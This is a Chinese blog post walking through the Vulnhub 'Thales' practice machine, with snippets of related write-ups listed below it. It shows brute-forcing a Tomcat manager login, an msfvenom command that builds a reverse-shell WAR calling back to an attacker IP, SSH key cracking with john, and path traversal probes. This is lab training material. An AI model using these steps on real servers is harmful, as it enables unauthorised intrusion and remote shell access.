Vulnhub靶场thales靶机通关攻略（一）

最新推荐文章于 2025-09-28 11:32:20 发布

原创最新推荐文章于 2025-09-28 11:32:20 发布 · 387 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#服务器 #linux #运维 #thales

1.在Orcde VirtuaBox打开靶机

2.拿kali（桥接模式）扫描网段

22和8080端口开放

3.查看网站

需要登录，尝试爆破密码

4.使用msf对应模块找到密码，有对应模块

5.登录进入后台，发现上传文件部分

6.用msfvenom反弹shell

msfvenom -p javajsp_shell_reverse_tcp LHOST=192.168.121.170 LPORT=6666 -f war -o revshell.war

点击后即可在kali监听到

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

与神明画鸭

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

vulhub靶场-Jangow

mashiro_hibiki的博客

03-13

869

发现Local Privilege Escalation（本地权限升级）漏洞，在网上找到了对应了漏洞编号为CVE-2017-16995，该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中，当用户提供恶意BPF程序使eBPF验证器模块产生计算错误，导致任意内存读写问题。猜测此处存在命令执行或文件包含漏洞，尝试了一下../../../../../../../etc/passwd没有回写，输入whoami命令出现回写。使用ping确认kali是与靶场网络连通的，注意kali要与靶机在同一网段。

prime1--vulnhub靶场通关教程

m0_74402888的博客

04-29

3000

是一个常用的命令行工具，用于从或向服务器传输数据，支持多种协议，如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数，就按照下面的步骤操作。漏洞查找工具，可以通过操作系统或cms的版本号搜索到相应漏洞，通过查看说明即可找到漏洞利用方法。之前扫到了ssh，http wordpress，那密码对应的是什么服务呢。在现实生活中的渗透测试中，我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件，你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器，看到靶机的网段。

参与评论您还未登录，请先登录后发表或查看评论

两种Vulfocus靶场部署方案

最新发布

佛系跟新......的博客

09-28

295

两种Vulfocus靶场部署方案

Vulhub靶场环境搭建

weixin_45908624的博客

09-15

886

在Ubantu系统上搭建靶场环境

vulnhub靶机Thales:1

m0_73248913的博客

07-23

362

vulnhub靶机

vulnhub靶场之Thales

qq_58091216的博客

02-04

1356

我们看到了两个txt文件，模式里面提示我们,一个flag在user.txt，一个在root.txt里面，那么我们进行查看user.txt文件，但是需要thales权限，我们查看notes.txt文件，notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh。一般情况下，我们首先去home目录下查看，然后在去/var/www/html/目录下查看有没有什么线索，我们看到了thales命令，我们进行查看。我们在thales目录下发现了隐藏的.ssh文件，我们进行查看。

Vulnhub项目：Thales:1

Ays.Ie的博客

05-30

987

Vulnhub项目：Thales:1

【Vulnhub靶场】THALES: 1

DG_s1mple

03-17

3621

环境准备下载靶机导入到vmware 信息收集我们使用arp-scan命令查找靶机的IP地址靶机IP地址为：192.168.2.18 攻击机IP地址为：192.168.2.17 我们使用nmap扫描靶机开启的服务发现靶机开放了tomcat和ssh，我们先访问他的tomcat 渗透开始 tomcat发现可以登录，我们尝试爆破一下成功爆破出账号密码，我们返回网站登录发现manager app页面可以上传文件我们使用如下命令创建一个反弹shell的木马上传 msfvenom -p ja

Vulnhub-Thales通关攻略

m0_66808441的博客

03-25

378

Kali端：将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only。靶机端：将下载好的靶机环境，导入 VritualBox，设置为 Host-Only 模式。

Vulnhub——THALES: 1靶场

Re1_zf的博客

11-15

992

1、msfvenom生成反弹shell的war文件2、python脚本转换公钥文件为JTR攻击兼容文件python3 ssh2john.py 需要处理的文件 > 输出的文件3、john爆破ssh公钥（基于JTR攻击兼容文件）john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件4、利用mkfifo命令实现权限维持mkfifo创建的是一个管道文件，这里这种情况下这个文件中的内容会实时更新，即输入的命令会被实时读取。

vulnhub靶场之THALES: 1

「虚幻私塾」

10-30

905

在.ssh下发现密匙：id_rsa文件，将密匙文件复制保存到本地文件upfine，然后命令：python2 /usr/share/john/ssh2john.py /home/kali/Desktop/upfine > passwd生成密码本，然后命令：john --wordlist=/usr/share/wordlists/rockyou.txt passwd进行破解，成功获取密码：vodka06。切换thales账户：su thales，读取下user.txt文件，成功获取到flag信息。

Vulnhub-thales靶机

lionwerson的博客

12-03

906

thales下载地址https://download.vulnhub.com/thales/Thales.zip1.导入virtual box,网络改为桥接模式，打开虚拟机。 2.nmap扫描一下端口：开放了8080端口和22端口。 3.浏览器打开8080端口：服务是tomcat，版本是9.0.52，没有任意文件读取和写入的漏洞，只能爆破manager app认证 4.burp认证爆破，tomcat的账号和密码格式是【用户名:密码】然后经过base64加密进行发送： ..

vulnhub靶机-THALES: 1

臭nana的博客

03-18

4819

1、找到靶机ip：192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口，开放22和8080端口 3、先搜索对应中间件有没有公开漏洞，没有发现，于是先从8080端口入手，访问之后是一个tomcat服务默认页面，先扫描一下目录可疑的就只有shell目录，但是访问就一直转圈，跟平常反弹shell的页面一样，所以猜测应该是作者测试时上传的，结合tomcat和shell目录，可以猜想应该是tomcat后台布置war包getshell，但是管理后台需要...

Vulnhub靶场:thales

2302_77710417的博客

07-30

393

生成完把1.jsp压缩一下，然后把后缀改成war。再在网页上传我们的webshell.war。添加之后，右击进入，进入命令执行，写一个反弹shell，就可以监听到了。扫不到ip的话，就去改网卡配置。（不会的可以翻一下博主前面几个靶机）找到一个可以上传文件的地方，我们用哥斯拉去生成一个jsp木马。爆破用户名和密码：tomcat，role1 ，登录一下试试。点一下Manager App发现了一个登录框。访问8080，发现中间件使用的Tomcat。在kali里找一下漏洞。

第303个Vulnhub靶场演练攻略:Thales1

weixin_44626085的博客

06-01

1109

本文介绍了针对 Vulnhub 靶机 "Thales" 的渗透测试过程。通过 netdiscover 和 nmap 扫描发现目标 IP 192.168.2.117，开放了 SSH(22) 和 Tomcat(8080) 服务。使用 Metasploit 的 tomcat_mgr_login 模块成功爆破出 Tomcat 管理凭据(tomcat:role1)，进而利用 tomcat_mgr_upload 模块上传恶意 WAR 文件获得 meterpreter 会话。整个过程展示了从信息收集到漏洞利用的完整渗透测

vulfocus靶场搭建（实测）

热门推荐

m0_50406447的博客

07-28

3万+

vulfocus的特性 1.启动：一键漏洞环境启动，方便简单。 2.自带 Flag 功能：每次启动 flag 都会自动更新，明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 Vulhub、Vulapps 中所有漏洞镜像。一、使用centos7作为靶机环境 1.挂载镜像 mkdir /mnt/cdrom:创建挂载点 mount /dev/cdrom /mnt/cdrom:镜像挂载注意：这个必须已连接，否则镜像挂载失败 2.配置yum源 (1)进入y

vulfocus靶场搭建

Elite的博客

02-21

3718

Vulfocus 是一个漏洞集成平台，将漏洞环境 docker 镜像，放入即可使用，开箱即用，我们可以通过搭建该靶场，简单方便地复现一些框架组件漏洞。

vulnhub入门靶场

m0_58481967的博客

11-27

1789

Dns解析同时还涉及到缓存的问题，比如有的时候把host文件里的映射关系删掉了，但还是可以访问，这就涉及到缓存的问题，缓存是什么不多赘述，比如你把hosts的映射删了，但是浏览器里还有缓存，它看见你访问driftingblues.box，然后找到了之前你访问成功的缓存记录，就直接去访问之前host映射的ip地址从而加速域名解析过程。本地hosts文件是优先级最高的缓存。应该是目录文件，dirsearch目录扫描没有这个文件是因为目录扫描也是根据目录字典进行爆破的，对于目录未收录的文件，也是扫不出来的。

Vulhub 靶场搭建

Tystem

03-15

2036

Vulhub是一个基于Docker和Docker-Conpose的漏洞环境集合，进入对应目录并执行一条语句即可启动一个全新的漏洞环境，让漏洞复现变得更加简单，让安全研究更加专注于漏洞原理本身。

Thales AC12 GPS手册：参考指南

"Thales GPS AC12 手册是一份英文版的技术文档，详细介绍了Thales公司的A12™, B12™ & AC12™系列OEM板的使用和功能。这份手册包含了产品的技术规格、操作指南以及可能涉及的法规遵从性信息。Thales Navigation是该...